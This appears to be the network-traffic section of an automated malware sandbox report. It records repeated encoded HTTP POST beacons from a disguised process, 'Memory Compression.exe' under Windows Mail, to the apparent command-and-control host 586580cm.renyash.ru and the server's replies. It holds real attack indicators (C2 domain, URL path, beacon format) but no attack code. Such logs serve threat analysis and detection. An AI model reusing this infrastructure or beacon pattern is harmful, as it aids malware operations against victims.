                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8907&min_rtt=2251&rtt_var=14157&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2042&delivery_rate=26304&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 24 01 35 58 3d 0c 35 2b 25 0d 3e 08 33 59 27 20 0b 58 3d 1c 3e 11 26 3b 0e 59 2e 28 24 14 23 2a 28 5d 25 3e 0f 59 30 3d 3e 56 3c 2b 2c 5d 00 10 20 1a 24 23 2d 5c 39 21 3d 54 29 57 3b 1c 23 12 3f 14 30 06 2a 51 20 33 02 03 23 3e 3e 01 3b 31 24 09 2d 0a 22 1c 39 3b 20 5d 23 1f 2b 55 00 14 20 14 27 29 12 10 2a 20 3b 0d 34 5e 31 02 25 28 37 0f 29 02 3b 0e 29 28 2a 0d 28 3f 39 0f 23 01 21 5a 3d 23 3c 41 27 22 0b 56 27 2c 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98$5X=5+%>3Y' X=>&;Y.($#*(]%>Y0=>V<+,] $#-\9!=T)W;#?0*Q 3#>>;1$-"9; ]#+U ')* ;4^1%(7);)(*(?9#!Z=#<A'"V',!_#.T?WT0
                                                                                                                                Jan 11, 2025 15:02:23.892916918 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:23.988553047 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:23.988715887 CET1056OUTData Raw: 5f 53 5d 5a 5f 5c 58 54 5c 5f 50 57 54 55 59 5d 59 54 5b 5c 57 53 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _S]Z_\XT\_PWTUY]YT[\WSTX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!]&34?! [!":0%)_!=]#!:63?%?&+X6(>.^''P*=
                                                                                                                                Jan 11, 2025 15:02:24.239921093 CET810INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:24 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=usK10WaQfNJAnik80WlBpuKXvgCE6auLQes6FKNBmALLqWrdk7ulMeFt3oywyyzySjaUDYXriwhFji4xXjx3H%2Fdd8%2Bkw2rgwZ1IKzQNRTIVmCoBta7ru%2BG7ymNo%2B5ypff4qa5sqq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900571bbac5842bb-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=12349&min_rtt=1603&rtt_var=18025&sent=7&recv=10&lost=0&retrans=0&sent_bytes=1005&recv_bytes=3384&delivery_rate=1775075&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.549746104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:24.520325899 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:24.877022982 CET1060OUTData Raw: 5a 55 5d 54 5a 5f 58 54 5c 5f 50 57 54 51 59 52 59 5c 5b 58 57 51 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZU]TZ_XT\_PWTQYRY\[XWQT[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&Y<"49357=9*!**T$&T<;X 7+R(;.^''P*5
                                                                                                                                Jan 11, 2025 15:02:24.982741117 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:25.235878944 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:25 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogrwrVyvgXuu84DOZX8bM9v6RXxOKN8he8Z9jAQL43ybHRJSF%2BYY%2FxkfYSQkZSQL69LRqfmZJSwBZQ2knW0Nft1%2FfouUlI%2FPy0ExiYKixfWz4tYkyzkj%2Bo5UrNPAxdd8E88AgMX2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900571c1dbba4394-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7814&min_rtt=1787&rtt_var=12726&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=29194&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a
                                                                                                                                Data Ascii: 4;W^Q
                                                                                                                                Jan 11, 2025 15:02:25.327615023 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.549751104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:25.668894053 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:26.056360960 CET1060OUTData Raw: 5f 51 5d 58 5f 53 58 56 5c 5f 50 57 54 5d 59 5e 59 53 5b 5b 57 5e 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _Q]X_SXV\_PWT]Y^YS[[W^TY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y%3(]<1;#_$5>95*0V _"S3(6 $'V=+.^''P*
                                                                                                                                Jan 11, 2025 15:02:26.129561901 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:26.379487038 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D3Zu08lUASRtP%2BHScUOsBn0jZqZMW9oCBenpJvHLB2Q8e6lw7VCK8hPkRAgkg3%2FMu84Q0pKJP4Q89oKTayejztNAjMCOeMUDps%2FpjhcDgjj%2FwEZdu1AixtZrUdiJxV0vf%2Fo%2BUb85"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900571c90a8d4392-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4069&min_rtt=1733&rtt_var=5323&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=71481&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.549753104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:26.590408087 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:26.939327002 CET1056OUTData Raw: 5f 52 58 5f 5f 5f 5d 53 5c 5f 50 57 54 55 59 53 59 5d 5b 5d 57 5f 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _RX___]S\_PWTUYSY][]W_TZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"%<\?'4[$?)2*4:>T$,"U<%7_ 4#W>.^''P*
                                                                                                                                Jan 11, 2025 15:02:27.069772005 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:27.304451942 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:27 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4LdRHaExv8LvexsCoBXs4DAOG2tJCkkAkKKQ5hSNVINH7rqvCV9jOEokbNBu%2B%2FYvnAdMJmIi2rKEPemBJBWwkJNZEQNqqqU8Vql7%2BCvA0pi7hNkQG5EvyTN72l3tccOmHmbgD5D6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900571ceec0ac461-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=27004&min_rtt=23087&rtt_var=16492&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1366&delivery_rate=26826&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.549758104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:27.505590916 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:27.862900972 CET1056OUTData Raw: 5f 51 5d 5f 5f 52 5d 51 5c 5f 50 57 54 55 59 5c 59 5d 5b 5a 57 55 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _Q]__R]Q\_PWTUY\Y][ZWUTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"2#<\>!47$#=9)[=; U#9%0/2*&?"#W*;.^''P*
                                                                                                                                Jan 11, 2025 15:02:27.974587917 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:28.214968920 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:28 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BrkHUVWQMiVmjlqNuBAPTK9s4uH6BUeYPqYoSd3n8DFaHlL067nclHCWHLKQoRe4z%2FKreVA5LXZBBmlo7BsRFiSr4O%2FClzSrAJZ8naKfHW4FnRGHUEYhGMi109pscHg0%2FstB6aJy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900571d48ebfc468-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2798&min_rtt=1499&rtt_var=3160&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1366&delivery_rate=122781&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.549764104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:28.820836067 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1756
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:29.284616947 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:29.591798067 CET1756OUTData Raw: 5f 51 58 5e 5a 58 5d 56 5c 5f 50 57 54 53 59 53 59 55 5b 50 57 51 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _QX^ZX]V\_PWTSYSYU[PWQTP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_%V<($\7!0$?9*=0!9=%<&W?6">.^''P*=
                                                                                                                                Jan 11, 2025 15:02:29.976938963 CET945INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:29 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxGMj8NJ0woXBrf0iIfEaShFVZ65riHm0eWa3hvklkiqTLaLJOEkRLCHqr3p%2FpWGoopMewKs6NHRuE%2FHay4aSWFfjGyltpZEndzfjdqlaK2OtgfGd99FZ49HfWg9dpSZs8%2BNEyfi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900571dcbf049dff-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3703&min_rtt=2089&rtt_var=4012&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2066&delivery_rate=97300&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 5c 21 3e 3a 55 21 38 32 57 3e 57 3f 59 33 30 32 01 2a 1c 3d 00 31 3b 3c 11 2d 01 3f 08 21 5c 34 59 25 3e 0f 58 25 3e 32 50 28 3b 2c 5d 00 10 23 0b 33 23 03 5d 2d 1c 2d 51 2a 57 2c 43 23 05 2b 5c 30 16 29 0e 22 30 27 5a 37 2d 0c 05 2f 1f 3f 52 2d 0a 07 01 2d 5e 24 5a 20 1f 2b 55 00 14 20 53 25 07 3c 13 29 23 37 09 20 2b 3e 5d 30 3b 0d 0e 3e 05 20 1e 2a 06 0f 52 28 2c 08 1a 20 06 21 5a 3e 33 3c 07 33 54 21 57 26 06 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a
                                                                                                                                Data Ascii: 98'\!>:U!82W>W?Y302*=1;<-?!\4Y%>X%>2P(;,]#3#]--Q*W,C#+\0)"0'Z7-/?R--^$Z +U S%<)#7 +>]0;> *R(, !Z>3<3T!W&!_#.T?WT
                                                                                                                                Jan 11, 2025 15:02:30.067445993 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.549786104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:35.091372967 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:35.555622101 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:35.816776037 CET1776OUTData Raw: 5a 52 5d 5e 5a 59 58 51 5c 5f 50 57 54 57 59 5c 59 56 5b 5c 57 50 54 51 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZR]^ZYXQ\_PWTWY\YV[\WPTQ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"2,?"77W"$6(^=96=#!:6$/W(&8547=.^''P*-
                                                                                                                                Jan 11, 2025 15:02:36.144357920 CET948INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:36 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KeuiabZy7k4HBVSv6krYmoWirWsF6dzx2oW8rdN7QXHCNiN9Q3MlEEAFbIIul%2FMAzVSo2bR4QY4goWaE0Fo8NIEgxovRuVdBFdhQs8LA7c4aTI%2FOCYiQ2oyZOSu52SpCaxjUrNEu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057203fc2e42b0-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4700&min_rtt=1744&rtt_var=6567&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2086&delivery_rate=57487&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 16 23 2d 32 1d 36 15 22 10 2a 1f 28 00 33 0e 22 01 2a 1c 3e 5d 32 28 3c 59 2f 28 28 1b 23 3a 06 58 24 2e 31 58 33 07 32 50 2b 3b 2c 5d 00 10 23 0b 33 0a 39 13 39 32 25 12 29 08 33 1d 20 3f 38 04 27 06 32 1d 23 1d 23 18 23 04 21 11 2f 31 23 51 2d 1a 21 01 2d 06 30 5c 23 35 2b 55 00 14 20 19 26 2a 37 06 3e 0d 30 50 34 06 22 58 27 02 3c 54 29 3c 28 57 28 28 35 1d 28 05 2a 19 37 06 25 1d 2a 0a 33 19 27 54 26 09 31 3c 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'#-26"*(3"*>]2(<Y/((#:X$.1X32P+;,]#3992%)3 ?8'2###!/1#Q-!-0\#5+U &*7>0P4"X'<T)<(W((5(*7%*3'T&1<!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.549791104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:36.872098923 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:37.220575094 CET1060OUTData Raw: 5a 57 58 5e 5f 5b 58 54 5c 5f 50 57 54 50 59 5a 59 5d 5b 5d 57 50 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZWX^_[XT\_PWTPYZY][]WPTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"'#<>1; 25$5/)6)# "U$?><+64#=;.^''P*1
                                                                                                                                Jan 11, 2025 15:02:37.336774111 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:37.603458881 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:37 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qTYcTf8kHXrOx04slv0TRjuX%2FLtVRIgE%2B%2Fkx16nt4JU78%2FmzbU3TO%2BIlRALK7cSNcMPugM6MhF5x83pRMR0ULb7wEjayUoetXDU0q7yD3FOd2gQMHuaKAHtN1rXH65BPRkkg0K13"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005720f18c1efa7-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4925&min_rtt=2006&rtt_var=6591&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=57561&cwnd=149&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.549797104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:38.762022018 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
